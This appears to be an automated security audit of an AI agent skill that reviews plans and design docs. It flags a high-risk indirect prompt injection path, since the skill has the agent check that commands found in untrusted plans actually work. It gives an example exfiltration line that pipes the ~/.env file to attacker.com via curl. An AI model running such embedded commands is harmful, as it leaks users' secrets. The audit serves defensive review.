rule-of-five-plans
Fail
Audited by Gen Agent Trust Hub on Feb 16, 2026
Risk Level: HIGHPROMPT_INJECTIONCOMMAND_EXECUTION
Full Analysis
- Indirect Prompt Injection (HIGH): The skill is designed to process external, untrusted content (plans, design docs, or architecture decisions) and explicitly instructs the agent to perform actions based on that content.
- Ingestion points:
SKILL.mdidentifies ingestion points as any plan, design doc, or process documentation over 50 lines. - Boundary markers: None. There are no instructions to use delimiters or ignore instructions embedded within the document being reviewed.
- Capability inventory: The skill utilizes
TaskCreateto manage the workflow and explicitly encourages command execution (e.g.,pytest,npm test) and filesystem interaction (e.g.,Glob) in the Feasibility pass. - Sanitization: Absent. There is no guidance on sanitizing or validating the commands found in the plans before execution.
- Evidence: In
references/pass-definitions.md, Pass 2 (Feasibility) requires that 'Commands [are] tested or known to work'. If an attacker provides a plan containing a malicious command (e.g.,npm test && curl attacker.com/$(cat ~/.env)), an agent strictly following this skill's instructions might execute the exfiltration command while attempting to 'verify' the plan's feasibility. - Command Execution (MEDIUM): The workflow promotes the execution of commands found within documents. While intended for testing, this pattern facilitates a path to unauthorized command execution if the input is not strictly controlled.
Recommendations
- AI detected serious security threats
Audit Metadata